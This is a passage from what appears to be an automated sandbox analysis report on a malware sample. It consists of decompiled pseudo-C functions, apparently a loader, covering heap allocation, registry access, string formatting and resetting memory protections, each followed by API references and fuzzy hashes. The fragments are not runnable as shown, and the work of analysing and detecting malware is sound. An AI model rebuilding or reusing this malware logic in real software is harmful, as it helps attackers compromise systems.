                                                                                                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                                                            				_t23 = E04876C01(0,  &_v8); // executed
                                                                                                                                                                                                                                                            				if(_t23 != 0) {
                                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t24 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            				_t4 = _t24 + 0x487edd0; // 0x5259378
                                                                                                                                                                                                                                                            				_t5 = _t24 + 0x487ed78; // 0x4f0053
                                                                                                                                                                                                                                                            				_t26 = E04878FAB( &_v16, _v8, _t5, _t4); // executed
                                                                                                                                                                                                                                                            				_t45 = _t26;
                                                                                                                                                                                                                                                            				if(_t45 == 0) {
                                                                                                                                                                                                                                                            					StrToIntExW(_v16, 0,  &_v12);
                                                                                                                                                                                                                                                            					_t45 = 8;
                                                                                                                                                                                                                                                            					if(_v12 < _t45) {
                                                                                                                                                                                                                                                            						_t45 = 1;
                                                                                                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t32 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            						_t11 = _t32 + 0x487edc4; // 0x525936c
                                                                                                                                                                                                                                                            						_t48 = _t11;
                                                                                                                                                                                                                                                            						_t12 = _t32 + 0x487ed78; // 0x4f0053
                                                                                                                                                                                                                                                            						_t54 = E04878B9C(_t11, _t12, _t11);
                                                                                                                                                                                                                                                            						_t58 = _t54;
                                                                                                                                                                                                                                                            						if(_t54 != 0) {
                                                                                                                                                                                                                                                            							_t35 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            							_t13 = _t35 + 0x487ee0e; // 0x30314549
                                                                                                                                                                                                                                                            							if(E04872327(_t48, _t58, _v8, _t54, _t13, 0x14) == 0) {
                                                                                                                                                                                                                                                            								_t60 =  *0x487d25c - 6;
                                                                                                                                                                                                                                                            								if( *0x487d25c <= 6) {
                                                                                                                                                                                                                                                            									_t42 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            									_t15 = _t42 + 0x487ec2a; // 0x52384549
                                                                                                                                                                                                                                                            									E04872327(_t48, _t60, _v8, _t54, _t15, 0x13);
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							_t38 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            							_t17 = _t38 + 0x487ee08; // 0x52593b0
                                                                                                                                                                                                                                                            							_t18 = _t38 + 0x487ede0; // 0x680043
                                                                                                                                                                                                                                                            							_t45 = E0487A202(_v8, 0x80000001, _t54, _t18, _t17);
                                                                                                                                                                                                                                                            							HeapFree( *0x487d238, 0, _t54);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					HeapFree( *0x487d238, 0, _v16);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t53 = _v8;
                                                                                                                                                                                                                                                            				if(_v8 != 0) {
                                                                                                                                                                                                                                                            					E0487A3B5(_t53);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _t45;
                                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                                            0x04879d82
                                                                                                                                                                                                                                                            0x04879d85
                                                                                                                                                                                                                                                            0x04879d8c
                                                                                                                                                                                                                                                            0x04879d8e
                                                                                                                                                                                                                                                            0x04879d8e
                                                                                                                                                                                                                                                            0x04879d91
                                                                                                                                                                                                                                                            0x04879d96
                                                                                                                                                                                                                                                            0x04879d9d
                                                                                                                                                                                                                                                            0x04879daa
                                                                                                                                                                                                                                                            0x04879daf
                                                                                                                                                                                                                                                            0x04879db3
                                                                                                                                                                                                                                                            0x04879dc1
                                                                                                                                                                                                                                                            0x04879dcf
                                                                                                                                                                                                                                                            0x04879dd3
                                                                                                                                                                                                                                                            0x04879e64
                                                                                                                                                                                                                                                            0x04879e64
                                                                                                                                                                                                                                                            0x04879dd9
                                                                                                                                                                                                                                                            0x04879dd9
                                                                                                                                                                                                                                                            0x04879dde
                                                                                                                                                                                                                                                            0x04879dde
                                                                                                                                                                                                                                                            0x04879de5
                                                                                                                                                                                                                                                            0x04879df1
                                                                                                                                                                                                                                                            0x04879df3
                                                                                                                                                                                                                                                            0x04879df5
                                                                                                                                                                                                                                                            0x04879df7
                                                                                                                                                                                                                                                            0x04879dfe
                                                                                                                                                                                                                                                            0x04879e10
                                                                                                                                                                                                                                                            0x04879e12
                                                                                                                                                                                                                                                            0x04879e19
                                                                                                                                                                                                                                                            0x04879e1b
                                                                                                                                                                                                                                                            0x04879e22
                                                                                                                                                                                                                                                            0x04879e2d
                                                                                                                                                                                                                                                            0x04879e2d
                                                                                                                                                                                                                                                            0x04879e19
                                                                                                                                                                                                                                                            0x04879e32
                                                                                                                                                                                                                                                            0x04879e37
                                                                                                                                                                                                                                                            0x04879e3e
                                                                                                                                                                                                                                                            0x04879e5c
                                                                                                                                                                                                                                                            0x04879e5e
                                                                                                                                                                                                                                                            0x04879e5e
                                                                                                                                                                                                                                                            0x04879df5
                                                                                                                                                                                                                                                            0x04879e70
                                                                                                                                                                                                                                                            0x04879e70
                                                                                                                                                                                                                                                            0x04879e72
                                                                                                                                                                                                                                                            0x04879e77
                                                                                                                                                                                                                                                            0x04879e79
                                                                                                                                                                                                                                                            0x04879e79
                                                                                                                                                                                                                                                            0x04879e84

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05259378,00000000,?,73BCF710,00000000,73BCF730), ref: 04879DC1
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,052593B0,?,00000000,30314549,00000014,004F0053,0525936C), ref: 04879E5E
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0487876C), ref: 04879E70
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                                                                                                                            • Opcode ID: 39b8f46fb0e36dbe5880a59e00aa5f106f450df4cd15e01945065168743a24bd
                                                                                                                                                                                                                                                            • Instruction ID: a5031b3066f9a4b6e1f4497256dfa9ee66e1a056152aa3b4971e65ca59e5dc9a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39b8f46fb0e36dbe5880a59e00aa5f106f450df4cd15e01945065168743a24bd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E3181B2A00108BEFB11DBA4DCA8DAA7BEDEF44314F1449A5E615DB120D7B0FE05DB51
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 54%
                                                                                                                                                                                                                                                            			E048785F4(void* __ecx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                                            				intOrPtr _t18;
                                                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t32 = __ecx;
                                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                                            				_t42 =  *0x487d340; // 0x5258d39
                                                                                                                                                                                                                                                            				_push(0x800);
                                                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                                                            				_push( *0x487d238);
                                                                                                                                                                                                                                                            				if( *0x487d24c >= 5) {
                                                                                                                                                                                                                                                            					if(RtlAllocateHeap() == 0) {
                                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                                            						_t30 = 8;
                                                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                                                            						if(_t30 != 0) {
                                                                                                                                                                                                                                                            							L10:
                                                                                                                                                                                                                                                            							 *0x487d24c =  *0x487d24c + 1;
                                                                                                                                                                                                                                                            							L11:
                                                                                                                                                                                                                                                            							return _t30;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_t44 = _a4;
                                                                                                                                                                                                                                                            						_t40 = _v8;
                                                                                                                                                                                                                                                            						 *_a16 = _a4;
                                                                                                                                                                                                                                                            						 *_a20 = E0487A090(_t44, _t40); // executed
                                                                                                                                                                                                                                                            						_t18 = E04871B68(_t37, _t40, _t44); // executed
                                                                                                                                                                                                                                                            						if(_t18 != 0) {
                                                                                                                                                                                                                                                            							 *_a8 = _t40;
                                                                                                                                                                                                                                                            							 *_a12 = _t18;
                                                                                                                                                                                                                                                            							if( *0x487d24c < 5) {
                                                                                                                                                                                                                                                            								 *0x487d24c =  *0x487d24c & 0x00000000;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							goto L11;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_t30 = 0xbf;
                                                                                                                                                                                                                                                            						E04879E85();
                                                                                                                                                                                                                                                            						RtlFreeHeap( *0x487d238, 0, _t40); // executed
                                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t24 = E04878D23(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t13);
                                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                                            					_t30 = _t24;
                                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t25 = RtlAllocateHeap(); // executed
                                                                                                                                                                                                                                                            				if(_t25 == 0) {
                                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t24 = E04871D67(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t25); // executed
                                                                                                                                                                                                                                                            				goto L5;
                                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                                            0x048785f4
                                                                                                                                                                                                                                                            0x048785f7
                                                                                                                                                                                                                                                            0x048785f8
                                                                                                                                                                                                                                                            0x04878602
                                                                                                                                                                                                                                                            0x04878609
                                                                                                                                                                                                                                                            0x0487860e
                                                                                                                                                                                                                                                            0x04878610
                                                                                                                                                                                                                                                            0x04878616
                                                                                                                                                                                                                                                            0x0487863e
                                                                                                                                                                                                                                                            0x04878656
                                                                                                                                                                                                                                                            0x04878658
                                                                                                                                                                                                                                                            0x04878659
                                                                                                                                                                                                                                                            0x0487865b
                                                                                                                                                                                                                                                            0x04878699
                                                                                                                                                                                                                                                            0x04878699
                                                                                                                                                                                                                                                            0x0487869f
                                                                                                                                                                                                                                                            0x048786a5
                                                                                                                                                                                                                                                            0x048786a5
                                                                                                                                                                                                                                                            0x0487865d
                                                                                                                                                                                                                                                            0x04878663
                                                                                                                                                                                                                                                            0x04878666
                                                                                                                                                                                                                                                            0x04878675
                                                                                                                                                                                                                                                            0x04878677
                                                                                                                                                                                                                                                            0x0487867e
                                                                                                                                                                                                                                                            0x048786b2
                                                                                                                                                                                                                                                            0x048786b7
                                                                                                                                                                                                                                                            0x048786b9
                                                                                                                                                                                                                                                            0x048786bb
                                                                                                                                                                                                                                                            0x048786bb
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048786b9
                                                                                                                                                                                                                                                            0x04878680
                                                                                                                                                                                                                                                            0x04878685
                                                                                                                                                                                                                                                            0x04878693
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04878693
                                                                                                                                                                                                                                                            0x0487864d
                                                                                                                                                                                                                                                            0x04878652
                                                                                                                                                                                                                                                            0x04878652
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04878652
                                                                                                                                                                                                                                                            0x04878618
                                                                                                                                                                                                                                                            0x04878620
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487862f
                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000800,73BCF710), ref: 04878618
                                                                                                                                                                                                                                                              • Part of subcall function 04871D67: GetTickCount.KERNEL32 ref: 04871D7B
                                                                                                                                                                                                                                                              • Part of subcall function 04871D67: wsprintfA.USER32 ref: 04871DCB
                                                                                                                                                                                                                                                              • Part of subcall function 04871D67: wsprintfA.USER32 ref: 04871DE8
                                                                                                                                                                                                                                                              • Part of subcall function 04871D67: wsprintfA.USER32 ref: 04871E14
                                                                                                                                                                                                                                                              • Part of subcall function 04871D67: HeapFree.KERNEL32(00000000,?), ref: 04871E26
                                                                                                                                                                                                                                                              • Part of subcall function 04871D67: wsprintfA.USER32 ref: 04871E47
                                                                                                                                                                                                                                                              • Part of subcall function 04871D67: HeapFree.KERNEL32(00000000,?), ref: 04871E57
                                                                                                                                                                                                                                                              • Part of subcall function 04871D67: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04871E85
                                                                                                                                                                                                                                                              • Part of subcall function 04871D67: GetTickCount.KERNEL32 ref: 04871E96
                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000800,73BCF710), ref: 04878636
                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000002,048787B7,?,048787B7,00000002,?,?,048791D2,?), ref: 04878693
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1676223858-0
                                                                                                                                                                                                                                                            • Opcode ID: c0503c29467eecfa28f50dee79577c252bd9753ae966904e3e784136d8cfc53f
                                                                                                                                                                                                                                                            • Instruction ID: 3148766f9da3dcb953aa4f64cf74da9e334f0fe85f52109038a016aabc445c88
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c0503c29467eecfa28f50dee79577c252bd9753ae966904e3e784136d8cfc53f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D211072210208FBEB11AF59D8ACA9A37ACEF49345F104D16FA01DB250EB74FD41DBA5
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                                                                                                            			E004011C0(void* __eax, long __edx, void* _a4) {
                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                                            				void* _t50;
                                                                                                                                                                                                                                                            				void* _t51;
                                                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t41 = __edx;
                                                                                                                                                                                                                                                            				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                                            				_t36 =  *(__eax + 6) & 0x0000ffff;
                                                                                                                                                                                                                                                            				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                                                                                                                                                                                                                            				_v20 = _t36;
                                                                                                                                                                                                                                                            				VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
                                                                                                                                                                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                            				if(_t36 <= 0) {
                                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                                            					return _v12;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t51 = _t50 + 0x24;
                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                            					_t54 = _v12;
                                                                                                                                                                                                                                                            					if(_t54 != 0) {
                                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					asm("bt dword [esi], 0x1d");
                                                                                                                                                                                                                                                            					if(_t54 >= 0) {
                                                                                                                                                                                                                                                            						asm("bt dword [esi], 0x1e");
                                                                                                                                                                                                                                                            						if(__eflags >= 0) {
                                                                                                                                                                                                                                                            							_t41 = 4;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							asm("bt dword [esi], 0x1f");
                                                                                                                                                                                                                                                            							asm("sbb edx, edx");
                                                                                                                                                                                                                                                            							_t41 = ( ~(_t41 & 0xffffff00 | __eflags > 0x00000000) & 0x00000002) + 2;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						asm("bt dword [esi], 0x1f");
                                                                                                                                                                                                                                                            						asm("sbb edx, edx");
                                                                                                                                                                                                                                                            						_t41 = ( ~(_t41 & 0xffffff00 | _t54 > 0x00000000) & 0x00000020) + 0x20;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t33 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t41,  &_v16); // executed
                                                                                                                                                                                                                                                            					if(_t33 == 0) {
                                                                                                                                                                                                                                                            						_v12 = GetLastError();
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t51 = _t51 + 0x28;
                                                                                                                                                                                                                                                            					_v8 = _v8 + 1;
                                                                                                                                                                                                                                                            					if(_v8 < _v20) {
                                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                                            0x004011c0
                                                                                                                                                                                                                                                            0x004011ca
                                                                                                                                                                                                                                                            0x004011cf
                                                                                                                                                                                                                                                            0x004011db
                                                                                                                                                                                                                                                            0x004011e8
                                                                                                                                                                                                                                                            0x004011ee
                                                                                                                                                                                                                                                            0x004011f0
                                                                                                                                                                                                                                                            0x004011f6
                                                                                                                                                                                                                                                            0x00401262
                                                                                                                                                                                                                                                            0x00401269
                                                                                                                                                                                                                                                            0x00401269
                                                                                                                                                                                                                                                            0x004011f8
                                                                                                                                                                                                                                                            0x004011fb
                                                                                                                                                                                                                                                            0x004011fb
                                                                                                                                                                                                                                                            0x004011ff
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00401201
                                                                                                                                                                                                                                                            0x00401205
                                                                                                                                                                                                                                                            0x0040121a
                                                                                                                                                                                                                                                            0x0040121e
                                                                                                                                                                                                                                                            0x00401234
                                                                                                                                                                                                                                                            0x00401220
                                                                                                                                                                                                                                                            0x00401220
                                                                                                                                                                                                                                                            0x00401229
                                                                                                                                                                                                                                                            0x0040122f
                                                                                                                                                                                                                                                            0x0040122f
                                                                                                                                                                                                                                                            0x00401207
                                                                                                                                                                                                                                                            0x00401207
                                                                                                                                                                                                                                                            0x00401210
                                                                                                                                                                                                                                                            0x00401215
                                                                                                                                                                                                                                                            0x00401215
                                                                                                                                                                                                                                                            0x00401245
                                                                                                                                                                                                                                                            0x00401249
                                                                                                                                                                                                                                                            0x00401251
                                                                                                                                                                                                                                                            0x00401251
                                                                                                                                                                                                                                                            0x00401254
                                                                                                                                                                                                                                                            0x00401257
                                                                                                                                                                                                                                                            0x00401260
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00401260
                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • VirtualProtect.KERNELBASE(00000000,?,00000004,?), ref: 004011EE
                                                                                                                                                                                                                                                            • VirtualProtect.KERNELBASE(00000000,?,00000004,?), ref: 00401245
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0040124B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036254659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1036280390.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ProtectVirtual$ErrorLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1469625949-0
                                                                                                                                                                                                                                                            • Opcode ID: 6266ebf051439d94c5c001651ea1f64610eb7615f7f60e7d97a4c4d9084fe041
                                                                                                                                                                                                                                                            • Instruction ID: c1c2e6cea6cf892c72c5368fe0732da1b9903c0c2bf3b58710883da527ccf5f9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6266ebf051439d94c5c001651ea1f64610eb7615f7f60e7d97a4c4d9084fe041
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A21D572900109EFDB109F98CC81EADB7B4FF94315F1080AEE541B7251D3389A89CB54
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                            			E00401936() {
                                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                            				void _v32;
                                                                                                                                                                                                                                                            				void* _v36;
                                                                                                                                                                                                                                                            				intOrPtr _t16;
                                                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                                                            				long _t26;
                                                                                                                                                                                                                                                            				int _t27;
                                                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                                                            				intOrPtr* _t33;
                                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                                                                                                                            				int _t44;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t16 =  *0x404150;
                                                                                                                                                                                                                                                            				if( *0x40412c > 5) {
                                                                                                                                                                                                                                                            					_t17 = _t16 + 0x4050f9;
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					_t17 = _t16 + 0x4050b1;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				E00401815(_t17, _t17);
                                                                                                                                                                                                                                                            				_t36 = 6;
                                                                                                                                                                                                                                                            				memset( &_v32, 0, _t36 << 2);
                                                                                                                                                                                                                                                            				if(E00401C94( &_v32,  &_v16,  *0x40414c ^ 0xfd7cd1cf) == 0) {
                                                                                                                                                                                                                                                            					_t26 = 0xb;
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					_t27 = lstrlenW( *0x404138);
                                                                                                                                                                                                                                                            					_t8 = _t27 + 2; // 0x2
                                                                                                                                                                                                                                                            					_t44 = _t27 + _t8;
                                                                                                                                                                                                                                                            					_t11 = _t44 + 8; // 0xa
                                                                                                                                                                                                                                                            					_t31 = E004012F4(_t39, _t11,  &_v32,  &_v36); // executed
                                                                                                                                                                                                                                                            					if(_t31 == 0) {
                                                                                                                                                                                                                                                            						_t38 =  *0x404138;
                                                                                                                                                                                                                                                            						_t33 = _v36;
                                                                                                                                                                                                                                                            						 *_t33 = 0;
                                                                                                                                                                                                                                                            						if(_t38 == 0) {
                                                                                                                                                                                                                                                            							 *(_t33 + 4) =  *(_t33 + 4) & 0x00000000;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							memcpy(_t33 + 4, _t38, _t44);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t26 = E00401884(_v28, _t39); // executed
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				ExitThread(_t26);
                                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                                            0x0040193c
                                                                                                                                                                                                                                                            0x0040194d
                                                                                                                                                                                                                                                            0x00401957
                                                                                                                                                                                                                                                            0x0040194f
                                                                                                                                                                                                                                                            0x0040194f
                                                                                                                                                                                                                                                            0x0040194f
                                                                                                                                                                                                                                                            0x0040195e
                                                                                                                                                                                                                                                            0x00401967
                                                                                                                                                                                                                                                            0x0040196c
                                                                                                                                                                                                                                                            0x0040198a
                                                                                                                                                                                                                                                            0x004019e9
                                                                                                                                                                                                                                                            0x0040198c
                                                                                                                                                                                                                                                            0x00401992
                                                                                                                                                                                                                                                            0x00401998
                                                                                                                                                                                                                                                            0x00401998
                                                                                                                                                                                                                                                            0x004019a6
                                                                                                                                                                                                                                                            0x004019aa
                                                                                                                                                                                                                                                            0x004019b1
                                                                                                                                                                                                                                                            0x004019b3
                                                                                                                                                                                                                                                            0x004019bb
                                                                                                                                                                                                                                                            0x004019bf
                                                                                                                                                                                                                                                            0x004019c5
                                                                                                                                                                                                                                                            0x004019d7
                                                                                                                                                                                                                                                            0x004019c7
                                                                                                                                                                                                                                                            0x004019cd
                                                                                                                                                                                                                                                            0x004019d2
                                                                                                                                                                                                                                                            0x004019c5
                                                                                                                                                                                                                                                            0x004019e0
                                                                                                                                                                                                                                                            0x004019e0
                                                                                                                                                                                                                                                            0x004019eb

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036254659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1036280390.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExitThreadlstrlenmemcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3726537860-0
                                                                                                                                                                                                                                                            • Opcode ID: dda5ce5b21e01da602c785ff0a082ff92e62d4893aa940197735e82575b759c7
                                                                                                                                                                                                                                                            • Instruction ID: adfc01ef2c4c99928d56c7e43a0b893f32d4cd3bad0bf6c8e060a3f5d1f17578
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dda5ce5b21e01da602c785ff0a082ff92e62d4893aa940197735e82575b759c7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7211B1B2404201ABE710EBA1CD59E9B77ECAB85304F01443BB645F71B1E738E545CB9A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                                                                                            			E04872055(void* __eflags, int _a4) {
                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                            				WCHAR* _v16;
                                                                                                                                                                                                                                                            				char* _v20;
                                                                                                                                                                                                                                                            				int _v24;
                                                                                                                                                                                                                                                            				void* _v36;
                                                                                                                                                                                                                                                            				char _v40;
                                                                                                                                                                                                                                                            				char _v68;
                                                                                                                                                                                                                                                            				char _v72;
                                                                                                                                                                                                                                                            				char _v76;
                                                                                                                                                                                                                                                            				char _v80;
                                                                                                                                                                                                                                                            				void _v84;
                                                                                                                                                                                                                                                            				char _v88;
                                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                            				intOrPtr _t40;
                                                                                                                                                                                                                                                            				int _t45;
                                                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                                                            				intOrPtr _t52;
                                                                                                                                                                                                                                                            				void* _t55;
                                                                                                                                                                                                                                                            				intOrPtr _t67;
